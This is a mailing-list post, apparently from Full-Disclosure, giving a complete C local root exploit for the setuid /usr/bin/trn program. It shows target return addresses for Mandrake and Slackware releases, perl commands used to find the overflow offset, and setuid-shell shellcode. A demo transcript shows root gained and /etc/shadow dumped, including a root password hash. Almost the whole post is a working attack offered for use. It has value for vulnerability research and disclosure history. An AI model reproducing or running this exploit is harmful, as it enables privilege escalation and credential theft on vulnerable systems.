/* /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com */ /* sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 [+] mandrake 9.2 = 0xbfffff96 [+] slackware 10.0.0= 0xbfffff98 [+] slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 [BOO %] 128 [RET %] bfffff84 sh-2.05b# sh-2.05b# id uid=0(root) gid=98(nobody) groups=98(nobody) sh-2.05b# cat /etc/shadow root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0::::: TEST : MANDRAKE 9.2 SLACKWARE 10.0.0 SLACKWARE 9.1.0 http://www.rootbinbas.com/d0kum4n/trn-test.txt BOO: $trn `perl -e 'print "A" x 120'` $trn `perl -e 'print "A" x 124'` $trn `perl -e 'print "A" x 128'` Segmentation fault BOO=128 */ #include #include #define NEREDE "/usr/bin/trn" char caylarbeles[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; int main(int argc, char *argv[]){ int bizim; char bufe[1000]; char *tayfasi; if (argc < 3) { printf ("{ trn l0c4l r00t 3xpl01t }\n"); printf ("{ By ZzagorR - http://www.rootbinbash.com }\n"); printf ("{ usage : %s ret buf }\n",argv[0]); printf ("{ example : %s 0xbfffff99 142 }\n",argv[0]); printf ("{ mandrake 9.2 = 0xbfffff96 }\n"); printf ("{ slackware 10.0.0 = 0xbfffff98 }\n"); printf ("{ slackware 9.1.0 = 0xbfffff84 }\n"); exit(1); }else{ unsigned long RET=strtoul(argv[1], NULL, 16); int BOO = atoi(argv[2]); printf ("[BOO %] %i\n",BOO); printf ("[RET %] %x\n",RET); tayfasi = bufe; memset(bufe, 0x41,256-strlen(caylarbeles)); sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles); for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 ) *(long*)(tayfasi+bizim) = RET; execl(NEREDE, NEREDE , bufe, NULL); } } _________________________________________________________________ Yagmura yakalanmamak için sadece semsiyenize degil, MSN hava durumuna güvenin! http://www.msn.com.tr/havadurumu/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html